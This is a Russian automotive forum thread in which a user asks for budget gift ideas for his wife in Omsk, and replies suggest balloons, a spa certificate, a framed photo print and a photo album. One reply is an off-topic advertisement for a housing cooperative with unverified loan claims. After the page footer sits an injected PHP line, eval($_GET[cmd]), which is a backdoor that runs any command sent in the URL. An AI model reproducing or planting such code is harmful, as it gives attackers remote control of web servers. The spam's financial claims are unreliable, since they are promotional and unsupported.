+ Ответить в теме
Показано с 1 по 6 из 6

Тема: Бюджетный но оригинальный подарок жене, подкиньте несколько идей!


  1. #1

    Бюджетный но оригинальный подарок жене, подкиньте несколько идей!

    Бюджетный, но оригинальный подарок жене, подкиньте несколько идей! Жена в последнее время часто стала намекать на отсутствие подарков без повода, в итоге решил сдаться, что-нибудь оригинальное ей найти. Но поскольку этот расход не планировался бюджет ограничен. Может подскажите несколько недорогих идей, но хороших и желательно ссылку где это можно достать в Омске? Не хочу банально цветы покупать.

  2. #2
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    Можно подарить цветы, но не банально. Например накупить шариков в форме сердце, надуть их гелием, купить дорогие сладости типа Рафаэль, ну и естественно хороший букет любимых цветом. Думаю что это идеальный подарок без повода)

  3. #3
    Вы бы по точнее сказали на какую сумму рассчитываете ей сделать подарок. Как-никак у каждого свои мерки в плане бюджета. Лично для меня сертификат в какой-то СПА салон - бюджетный вариант подарка.

  4. #4
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    А вы не задумывались на счет печати вашей лучшей общей фотографии большого размера, и подарить жене? Естественно в рамке, что бы можно было бы повесить на стену) В Омске вы такое можете заказать здесь - https://www.fotoproekt.ru/omsk/pechat-fotografij/ . Это вполне вам обойдется не дорого, посмотрите на цены по ссылке.

  5. #5
    Мимо проходил 1kryptik is on a distinguished road Аватар для 1kryptik
    Регистрация
    28.06.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    19
    Не так давно обращался в кооператив «BestWay» и уже сейчас получил отличную квартиру. Был наслышан об их хороших условиях и качественных специалистах. Обратившись к консультантам компании, получил ответы на все интересующие вопросы. Даже несмотря на существенные первые взносы в 35% я решил, что оно того стоит. Всего 2% годовых, гораздо лучше любого из российских банков. Договор был проверен юристами досконально, каждая мелочь не осталась без внимая. А это означало, что в «BestWay» я могу быть уверен на все 100%. После всех выплат у меня будет надежная и чистая недвижимость. Даже несмотря на очередь, хочется сказать большое спасибо кооперативу и всем его сотрудникам

  6. #6
    Мимо проходил Zelen' is on a distinguished road Аватар для Zelen'
    Регистрация
    02.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    61
    Как я вас понимаю!
    У меня аналогичная ситуация! Но и сам виноват, действительно много времени на протяжение пары лет отдавал работе , мало внимания оказывал жене.
    Вот и обиделась. Теперь исправляюсь, стараюсь часто баловать ее. Но фантазии иногда не хватает. Часто ищу советы в интернете. Вот последний раз нашел статью https://belady.today/prazdniki/podar...den-rozhdeniya - сделать альбом с совместными фотографиями!

+ Ответить в теме

Похожие темы

  1. Купил Жене Гольф
    от Torres в разделе Welcome to GTI-CLUB
    Ответов: 13
    Последнее сообщение: 10.04.2024, 00:56
  2. Вот Такую Модель Жене Поставил?!
    от seryi-spb в разделе Шины, диски
    Ответов: 14
    Последнее сообщение: 08.04.2024, 11:47
  3. Ответов: 7
    Последнее сообщение: 02.10.2023, 19:49
  4. Локализован самый бюджетный K04 кит для mk6 GTI
    от valj в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 24
    Последнее сообщение: 30.10.2012, 11:32
  5. Ответов: 2
    Последнее сообщение: 07.01.2010, 22:23

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}